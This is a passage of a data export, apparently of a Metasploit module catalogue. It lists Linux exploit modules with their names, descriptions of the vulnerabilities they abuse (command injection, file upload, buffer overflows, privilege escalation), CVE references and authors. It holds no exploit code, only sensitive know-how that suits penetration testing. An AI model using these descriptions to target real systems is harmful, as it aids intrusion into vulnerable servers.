Arbitrary PHP File Upload Vulnerability",600,"This module exploits a file upload vulnerability found in Symantec Web Gateway's HTTP service. Due to the incorrect use of file extensions in the upload_file() function, attackers may to abuse the spywall/blocked_file.php file in order to upload a malicious PHP file without any authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-05-17 00:00:00",0,,"aggressive","t","BID-53443, CVE-2012-0299, OSVDB-82025, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-091","Tenable Network Security, juan vazquez " 41,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/symantec_web_gateway_lfi.rb","exploit","linux/http/symantec_web_gateway_lfi","exploit/linux/http/symantec_web_gateway_lfi","Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability",600,"This module exploits a vulnerability found in Symantec Web Gateway's HTTP service. By injecting PHP code in the access log, it is possible to load it with a directory traversal flaw, which allows remote code execution under the context of 'apache'. Please note that it may take up to several minutes to retrieve access_log, which is about the amount of time required to see a shell back.","Metasploit Framework License (BSD)","f","2012-05-17 00:00:00",0,,"aggressive","t","CVE-2012-0297, EDB-18932, OSVDB-82023, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00","Unknown, muts, sinn3r " 42,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb","exploit","linux/http/symantec_web_gateway_pbcontrol","exploit/linux/http/symantec_web_gateway_pbcontrol","Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",600,"This module exploits a command injection vulnerability found in Symantec Web Gateway's HTTP service. While handling the filename parameter, the Spywall API does not do any filtering before passing it to an exec() call in proxy_file(), thus results in remote code execution under the context of the web server. Please note authentication is NOT needed to gain access.","Metasploit Framework License (BSD)","f","2012-07-23 00:00:00",0,,"aggressive","t","BID-54426, CVE-2012-2953, EDB-20088, OSVDB-84120, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00","muts, sinn3r " 43,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/vcms_upload.rb","exploit","linux/http/vcms_upload","exploit/linux/http/vcms_upload","V-CMS PHP File Upload and Execute",600,"This module exploits a vulnerability found on V-CMS's inline image upload feature. The problem is due to the inline_image_upload.php file not checking the file type before saving it on the web server. This allows any malicious user to upload a script (such as PHP) without authentication, and then execute it with a GET request. The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only allows jpg, jpeg, png, gif, bmp, but it is still possible to upload a PHP file as one of those extension names, which may still be leveraged in an attack.","Metasploit Framework License (BSD)","f","2011-11-27 00:00:00",0,,"aggressive","t","BID-50706, CVE-2011-4828, URL-http://bugs.v-cms.org/view.php?id=53, URL-http://xforce.iss.net/xforce/xfdb/71358","AutoSec Tools, sinn3r " 44,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/wanem_exec.rb","exploit","linux/http/wanem_exec","exploit/linux/http/wanem_exec","WAN Emulator v2.3 Command Execution",600,"This module exploits a command execution vulnerability in WAN Emulator version 2.3 which can be abused to allow unauthenticated users to execute arbitrary commands under the context of the 'www-data' user. The 'result.php' script calls shell_exec() with user controlled data from the 'pc' parameter. This module also exploits a command execution vulnerability to gain root privileges. The 'dosu' binary is suid 'root' and vulnerable to command execution in argument one.","Metasploit Framework License (BSD)","t","2012-08-12 00:00:00",0,,"aggressive","t","OSVDB-85344, OSVDB-85345, URL-http://itsecuritysolutions.org/2012-08-12-wanem-v2.3-multiple-vulnerabilities/","Brendan Coles " 45,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/webcalendar_settings_exec.rb","exploit","linux/http/webcalendar_settings_exec","exploit/linux/http/webcalendar_settings_exec","WebCalendar 1.2.4 Pre-Auth Remote Code Injection",600,"This modules exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or less. If not removed, the settings.php script meant for installation can be update by an attacker, and then inject code in it. This allows arbitrary code execution as www-data.","Metasploit Framework License (BSD)","f","2012-04-23 00:00:00",0,,"aggressive","t","CVE-2012-1495, EDB-18775, OSVDB-81329","EgiX, sinn3r " 46,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/webid_converter.rb","exploit","linux/http/webid_converter","exploit/linux/http/webid_converter","WeBid converter.php Remote PHP Code Injection",600,"This module exploits a vulnerability found in WeBid version 1.0.2. By abusing the converter.php file, a malicious user can inject PHP code in the includes/currencies.php script without any authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-07-05 00:00:00",0,,"aggressive","t","EDB-17487, OSVDB-73609, URL-http://www.webidsupport.com/forums/showthread.php?3892","EgiX, juan vazquez " 47,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/zen_load_balancer_exec.rb","exploit","linux/http/zen_load_balancer_exec","exploit/linux/http/zen_load_balancer_exec","ZEN Load Balancer Filelog Command Execution",600,"This module exploits a vulnerability in ZEN Load Balancer version 2.0 and 3.0-rc1 which could be abused to allow authenticated users to execute arbitrary code under the context of the 'root' user. The 'content2-2.cgi' file uses user controlled data from the 'filelog' parameter within backticks.","Metasploit Framework License (BSD)","t","2012-09-14 00:00:00",0,,"aggressive","t","OSVDB-85654, URL-http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/","Brendan Coles " 48,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb","exploit","linux/http/zenoss_showdaemonxmlconfig_exec","exploit/linux/http/zenoss_showdaemonxmlconfig_exec","Zenoss 3 showDaemonXMLConfig Command Execution",400,"This module exploits a command execution vulnerability in Zenoss 3.x which could be abused to allow authenticated users to execute arbitrary code under the context of the 'zenoss' user. The show_daemon_xml_configs() function in the 'ZenossInfo.py' script calls Popen() with user controlled data from the 'daemon' parameter.","Metasploit Framework License (BSD)","f","2012-07-30 00:00:00",0,,"aggressive","t","OSVDB-84408, URL-http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/","Brendan Coles " 49,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/ids/snortbopre.rb","exploit","linux/ids/snortbopre","exploit/linux/ids/snortbopre","Snort Back Orifice Pre-Preprocessor Buffer Overflow",400,"This module exploits a stack buffer overflow in the Back Orifice pre-processor module included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could be used to completely compromise a Snort sensor, and would typically gain an attacker full root or administrative privileges.","BSD License","f","2005-10-18 00:00:00",0,,"aggressive","t","BID-15131, CVE-2005-3252, OSVDB-20034, URL-http://xforce.iss.net/xforce/alerts/id/207","KaiJern Lau " 50,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/imap/imap_uw_lsub.rb","exploit","linux/imap/imap_uw_lsub","exploit/linux/imap/imap_uw_lsub","UoW IMAP server LSUB Buffer Overflow",400,"This module exploits a buffer overflow in the 'LSUB' command of the University of Washington IMAP service. This vulnerability can only be exploited with a valid username and password.","Metasploit Framework License (BSD)","f","2000-04-16 00:00:00",0,,"aggressive","t","BID-1110, CVE-2000-0284, EDB-284, OSVDB-12037","jduck , patrick " 51,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/local/hp_smhstart.rb","exploit","linux/local/hp_smhstart","exploit/linux/local/hp_smhstart","HP System Management Homepage Local Privilege Escalation",300,"Versions of HP System Management Homepage <= 7.1.2 include a setuid root smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR env variable.","Metasploit Framework License (BSD)","f","2013-03-30 00:00:00",0,,"aggressive","t","OSVDB-91990","agix" 52,"2013-05-14 23:14:14","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/local/kloxo_lxsuexec.rb","exploit","linux/local/kloxo_lxsuexec","exploit/linux/local/kloxo_lxsuexec","Kloxo Local Privilege Escalation",300,"Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as lxsuexec and lxrestart, allow local privilege escalation to root from uid 48, Apache by default on CentOS 5.8, the operating system supported by Kloxo. This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.","Metasploit Framework License (BSD)","t","2012-09-18 00:00:00",0,,"aggressive","t","EDB-25406, URL-http://roothackers.net/showthread.php?tid=92","HTP, juan vazquez " 53,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/local/sock_sendpage.rb","exploit","linux/local/sock_sendpage","exploit/linux/local/sock_sendpage","Linux Kernel Sendpage Local Privilege Escalation",500,"The Linux kernel failed to properly initialize some entries the proto_ops struct for several protocols, leading to NULL being derefenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. Several public exploits exist for this vulnerability, including spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c. All Linux 2.4/2.6 versions since May 2001 are believed to be affected: 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4","Metasploit Framework License (BSD)","f","2009-08-13 00:00:00",0,,"aggressive","t","CVE-2009-2692, URL-http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html, URL-http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz","Julien Tinnes , Tavis Ormandy, egypt , rcvalle, spender" 54,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/local/udev_netlink.rb","exploit","linux/local/udev_netlink","exploit/linux/local/udev_netlink","Linux udev Netlink Local Privilege Escalation",500,"Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland.","Metasploit Framework License (BSD)","f","2009-04-16 00:00:00",0,,"aggressive","t","BID-34536, CVE-2009-1185, OSVDB-53810","Jon Oberheide, egypt , kcope" 55,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb","exploit","linux/madwifi/madwifi_giwscan_cb","exploit/linux/madwifi/madwifi_giwscan_cb","Madwifi SIOCGIWSCAN Buffer Overflow",200,"The Madwifi driver under Linux is vulnerable to a remote kernel-mode stack-based buffer overflow. The vulnerability is triggered by one of these properly crafted information element: WPA, RSN, WME and Atheros OUI Current madwifi driver (0.9.2) and and all madwifi-ng drivers since r1504 are vulnerable Madwifi 0.9.2.1 release corrects the issue. This module has been tested against Ubuntu 6.10 and is 100% reliable, doesn\'t crash the Wifi stack and can exploit the same machine multiple time without the need to reboot it. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","f","2006-12-08 00:00:00",,,"aggressive","t","CVE-2006-6332, OSVDB-31267, URL-http://www.madwifi.org","Julien Tinnes , Laurent Butti <0x9090 at gmail.com>" 56,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/accellion_fta_mpipe2.rb","exploit","linux/misc/accellion_fta_mpipe2","exploit/linux/misc/accellion_fta_mpipe2","Accellion File Transfer Appliance MPIPE2 Command Execution",600,"This module exploits a chain of vulnerabilities in the Accellion File Transfer appliance. This appliance exposes a UDP service on port 8812 that acts as a gateway to the internal communication bus. This service uses Blowfish encryption for authentication, but the appliance ships with two easy to guess default authentication keys. This module abuses the known default encryption keys to inject a message into the communication bus. In order to execute arbitrary commands on the remote appliance, a message is injected into the bus destined for the 'matchrep' service. This service exposes a function named 'insert_plugin_meta_info' which is vulnerable to an input validation flaw in a call to system(). This provides access to the 'soggycat' user account, which has sudo privileges to run the primary admin tool as root. These two flaws are fixed in update version FTA_8_0_562.","Metasploit Framework License (BSD)","t","2011-02-07 00:00:00",0,,"aggressive","t","OSVDB-71362, OSVDB-71363, URL-http://www.rapid7.com/security-center/advisories/R7-0039.jsp","hdm " 57,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/drb_remote_codeexec.rb","exploit","linux/misc/drb_remote_codeexec","exploit/linux/misc/drb_remote_codeexec","Distributed Ruby Send instance_eval/syscall Code Execution",600,"This module exploits remote code execution vulnerabilities in dRuby","Metasploit Framework License (BSD)","f","2011-03-23 00:00:00",0,,"aggressive","t","URL-http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html","joernchen " 58,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/gld_postfix.rb","exploit","linux/misc/gld_postfix","exploit/linux/misc/gld_postfix","GLD (Greylisting Daemon) Postfix Buffer Overflow",400,"This module exploits a stack buffer overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.","Metasploit Framework License (BSD)","t","2005-04-12 00:00:00",0,,"aggressive","t","BID-13129, CVE-2005-1099, EDB-934, OSVDB-15492","patrick " 59,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb","exploit","linux/misc/hp_data_protector_cmd_exec","exploit/linux/misc/hp_data_protector_cmd_exec","HP Data Protector 6 EXEC_CMD Remote Code Execution",600,"This exploit abuses a vulnerability in the HP Data Protector service. This flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD command and traverse back to /bin/sh, this allows arbitrary remote code execution under the context of root.","Metasploit Framework License (BSD)","f","2011-02-07 00:00:00",0,,"aggressive","t","CVE-2011-0923, OSVDB-72526, URL-http://c4an-dl.blogspot.com/hp-data-protector-vuln.html, URL-http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-055/, URL-https://community.rapid7.com/thread/2253","Javier Ignacio, c4an, ch0ks, wireghoul" 60,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/hplip_hpssd_exec.rb","exploit","linux/misc/hplip_hpssd_exec","exploit/linux/misc/hplip_hpssd_exec","HPLIP hpssd.py From Address Arbitrary Command Execution",600,"This module exploits a command execution vulnerable in the hpssd.py daemon of the Hewlett-Packard Linux Imaging and Printing Project. According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable. This module was written and tested using the Fedora 6 Linux distribution. On the test system, the daemon listens on localhost only and runs with root privileges. Although the configuration shows the daemon is to listen on port 2207, it actually listens on a dynamic port. NOTE: If the target system does not have a 'sendmail' command installed, this vulnerability cannot be exploited.","Metasploit Framework License (BSD)","t","2007-10-04 00:00:00",0,,"aggressive","t","BID-26054, CVE-2007-5208, OSVDB-41693, URL-https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit, URL-https://bugzilla.redhat.com/show_bug.cgi?id=319921","jduck " 61,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/ib_inet_connect.rb","exploit","linux/misc/ib_inet_connect","exploit/linux/misc/ib_inet_connect","Borland InterBase INET_connect() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38605, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 62,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/ib_jrd8_create_database.rb","exploit","linux/misc/ib_jrd8_create_database","exploit/linux/misc/ib_jrd8_create_database","Borland InterBase jrd8_create_database() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38606, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 63,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/ib_open_marker_file.rb","exploit","linux/misc/ib_open_marker_file","exploit/linux/misc/ib_open_marker_file","Borland InterBase open_marker_file() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5244, OSVDB-38610, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 64,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/ib_pwd_db_aliased.rb","exploit","linux/misc/ib_pwd_db_aliased","exploit/linux/misc/ib_pwd_db_aliased","Borland InterBase PWD_db_aliased() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38607, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 65,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/lprng_format_string.rb","exploit","linux/misc/lprng_format_string","exploit/linux/misc/lprng_format_string","LPRng use_syslog Remote Format String Vulnerability",300,"This module exploits a format string vulnerability in the LPRng print server. This vulnerability was discovered by Chris Evans. There was a publicly circulating worm targeting this vulnerability, which prompted RedHat to pull their 7.0 release. They consequently re-released it as ""7.0-respin"".","Metasploit Framework License (BSD)","t","2000-09-25 00:00:00",,,"aggressive","t","BID-1712, CVE-2000-0917, EDB-226, EDB-227, EDB-230, OSVDB-421, URL-http://www.cert.org/advisories/CA-2000-22.html, URL-https://bugzilla.redhat.com/show_bug.cgi?id=17756, US-CERT-VU-382365","jduck " 66,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/mongod_native_helper.rb","exploit","linux/misc/mongod_native_helper","exploit/linux/misc/mongod_native_helper","MongoDB nativeHelper.apply Remote Code Execution",300,"This module exploit a the nativeHelper feature from spiderMonkey which allows to to control execution by calling it wit specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.","Metasploit Framework License (BSD)","f","2013-03-24 00:00:00",0,,"aggressive","t","BID-58695, CVE-2013-1892, OSVDB-91632, URL-http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/","agix" 67,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/nagios_nrpe_arguments.rb","exploit","linux/misc/nagios_nrpe_arguments","exploit/linux/misc/nagios_nrpe_arguments","Nagios Remote Plugin Executor Arbitrary Command Execution",600,"The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.","Metasploit Framework License (BSD)","f","2013-02-21 00:00:00",0,,"aggressive","t","BID-58142, CVE-2013-1362, OSVDB-90582, URL-http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability","Rudolph Pereir, jwpari " 68,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/netsupport_manager_agent.rb","exploit","linux/misc/netsupport_manager_agent","exploit/linux/misc/netsupport_manager_agent","NetSupport Manager Agent Remote Buffer Overflow",200,"This module exploits a buffer overflow in NetSupport Manager Agent. It uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.","Metasploit Framework License (BSD)","t","2011-01-08 00:00:00",0,,"aggressive","t","BID-45728, CVE-2011-0404, EDB-15937, OSVDB-70408, URL-http://seclists.org/fulldisclosure/2011/Jan/90","Evan, Luca Carettoni ( , jduck " 69,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb","exploit","linux/misc/novell_edirectory_ncp_bof","exploit/linux/misc/novell_edirectory_ncp_bof","Novell eDirectory 8 Buffer Overflow",300,"This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The vulnerability exists in the ndsd daemon, specifically in the NCP service, while parsing a specially crafted Keyed Object Login request. It allows remote code execution with root privileges.","Metasploit Framework License (BSD)","t","2012-12-12 00:00:00",0,,"aggressive","t","BID-57038, CVE-2012-0432, EDB-24205, OSVDB-88718, URL-http://seclists.org/fulldisclosure/2013/Jan/97, URL-http://www.novell.com/support/kb/doc.php?id=3426981","David Klein, Gary Nilson, juan vazquez " 70,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/zabbix_server_exec.rb","exploit","linux/misc/zabbix_server_exec","exploit/linux/misc/zabbix_server_exec","Zabbix Server Arbitrary Command Execution",600,"This module abuses the ""Command"" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID ""0"" is used, if it doesn't work, the Node ID is leaked from the error message and exploitation retried. According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2009-09-10 00:00:00",0,,"aggressive","t","BID-37989, CVE-2009-4498, EDB-10432, OSVDB-60965, URL-https://support.zabbix.com/browse/ZBX-1030","Nicob , juan vazquez " 71,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/mysql/mysql_yassl_getname.rb","exploit","linux/mysql/mysql_yassl_getname","exploit/linux/mysql/mysql_yassl_getname","MySQL yaSSL CertDecoder::GetName Buffer Overflow",400,"This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier) implementation bundled with MySQL. By sending a specially crafted client certificate, an attacker can execute arbitrary code. This vulnerability is present within the CertDecoder::GetName function inside ""taocrypt/src/asn.cpp"". However, the stack buffer that is written to exists within a parent function's stack frame. NOTE: This vulnerability requires a non-default configuration. First, the attacker must be able to pass the host-based authentication. Next, the server must be configured to listen on an accessible network interface. Lastly, the server must have been manually configured to use SSL. The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing on Windows XP SP3, these protections successfully prevented exploitation. Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary package were not exploitable due to the use of the compiler's FORTIFY feature. Although suse11 was mentioned in the original blog post, the binary package they provide does not contain yaSSL or support SSL.","Metasploit Framework License (BSD)","t","2010-01-25 00:00:00",0,,"aggressive","t","BID-37640, BID-37943, BID-37974, CVE-2009-4484, OSVDB-61956, URL-http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html, URL-http://secunia.com/advisories/38344/","jduck " 72,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/mysql/mysql_yassl_hello.rb","exploit","linux/mysql/mysql_yassl_hello","exploit/linux/mysql/mysql_yassl_hello","MySQL yaSSL SSL Hello Message Buffer Overflow",400,"This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier) implementation bundled with MySQL <= 6.0. By sending a specially crafted Hello packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-01-04 00:00:00",0,,"aggressive","t","BID-27140, CVE-2008-0226, OSVDB-41195","MC " 73,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb","exploit","linux/pop3/cyrus_pop3d_popsubfolders","exploit/linux/pop3/cyrus_pop3d_popsubfolders","Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",300,"This exploit takes advantage of a stack based overflow. Once the stack corruption has occured it is possible to overwrite a pointer which is later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability. NOTE: The popsubfolders option is a non-default setting. I chose to overwrite the GOT with my shellcode and return to it. This defeats the VA random patch and possibly other stack protection features. Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with a version containing the vulnerable code, it is not exploitable due to the use of the FORTIFY_SOURCE compiler enhancement","Metasploit Framework License (BSD)","t","2006-05-21 00:00:00",0,,"aggressive","t","BID-18056, CVE-2006-2502, EDB-2053, EDB-2185, OSVDB-25853, URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html","bannedit , jduck " 74,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/postgres/postgres_payload.rb","exploit","linux/postgres/postgres_payload","exploit/linux/postgres/postgres_payload","PostgreSQL for Linux Payload Execution",600,"On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries's from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object's constructor, it does not need to conform to specific Postgres API versions.","Metasploit Framework License (BSD)","f","2007-06-05 00:00:00",0,,"aggressive","t","URL-http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt","egypt , midnitesnake, todb " 75,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/pptp/poptop_negative_read.rb","exploit","linux/pptp/poptop_negative_read","exploit/linux/pptp/poptop_negative_read","Poptop Negative Read Overflow",500,"This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. The server will by default only allow 4 concurrent manager processes (what we run our code in), so you could have a max of 4 shells at once. Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock.","Metasploit Framework License (BSD)","t","2003-04-09 00:00:00",0,,"aggressive","t","CVE-2003-0213, OSVDB-3293, URL-http://securityfocus.com/archive/1/317995, URL-http://www.freewebs.com/blightninjas/","spoonm " 76,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb","exploit","linux/proxy/squid_ntlm_authenticate","exploit/linux/proxy/squid_ntlm_authenticate","Squid NTLM Authenticate Overflow",500,"This is an exploit for Squid\'s NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user defined length. Props to iDEFENSE for the advisory.","Metasploit Framework License (BSD)","f","2004-06-08 00:00:00",0,,"aggressive","t","BID-10500, CVE-2004-0541, OSVDB-6791, URL-http://www.idefense.com/application/poi/display?id=107","skape " 77,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/samba/chain_reply.rb","exploit","linux/samba/chain_reply","exploit/linux/samba/chain_reply","Samba chain_reply Memory Corruption (Linux x86)",400,"This exploits a memory corruption vulnerability present in Samba versions prior to 3.3.13. When handling chained response packets, Samba fails to validate the offset value used when building the next part. By setting this value to a number larger than the destination buffer size, an attacker can corrupt memory. Additionally, setting this value to a value smaller than 'smb_wct' (0x24) will cause the header of the input buffer chunk to be corrupted. After close inspection, it appears that 3.0.x versions of Samba are not exploitable. Since they use an ""InputBuffer"" size of 0x20441, an attacker cannot cause memory to be corrupted in an exploitable way. It is possible to corrupt the heap header of the ""InputBuffer"", but it didn't seem possible to get the chunk to be processed again prior to process exit. In order to gain code execution, this exploit attempts to overwrite a ""talloc chunk"" destructor function pointer. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the nx memory protection. NOTE: It is possible to make exploitation attempts indefinitely since Samba forks for user sessions in the default configuration.","Metasploit Framework License (BSD)","t","2010-06-16 00:00:00",0,,"aggressive","t","CVE-2010-2063, OSVDB-65518, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=873","Jun Mao, jduck " 78,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/samba/lsa_transnames_heap.rb","exploit","linux/samba/lsa_transnames_heap","exploit/linux/samba/lsa_transnames_heap","Samba lsa_io_trans_names Heap Overflow",400,"This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additonally, this module will not work when the Samba ""log level"" parameter is higher than ""2"".","Metasploit Framework License (BSD)","t","2007-05-14 00:00:00",0,,"aggressive","t","CVE-2007-2446, OSVDB-34699","Adriano Lima , Ramon de C Valle , hdm " 79,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/samba/setinfopolicy_heap.rb","exploit","linux/samba/setinfopolicy_heap","exploit/linux/samba/setinfopolicy_heap","Samba SetInformationPolicy AuditEventsInfo Heap Overflow",300,"This module triggers a vulnerability in the LSA RPC service of the Samba daemon because of an error on the PIDL auto-generated code. Making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to trigger a heap overflow and finally execute arbitrary code with root privileges. The module uses brute force to guess the stackpivot/rop chain or the system() address and redirect flow there in order to bypass NX. The start and stop addresses for brute forcing have been calculated empirically. On the other hand the module provides the StartBrute and StopBrute which allow the user to configure his own addresses.","Metasploit Framework License (BSD)","t","2012-04-10 00:00:00",0,,"aggressive","t","BID-52973, CVE-2012-1182, OSVDB-81303, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-069/","Unknown, blasty, juan vazquez , mephos, sinn3r " 80,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/samba/trans2open.rb","exploit","linux/samba/trans2open","exploit/linux/samba/trans2open","Samba trans2open Overflow (Linux x86)",500,"This exploits the buffer 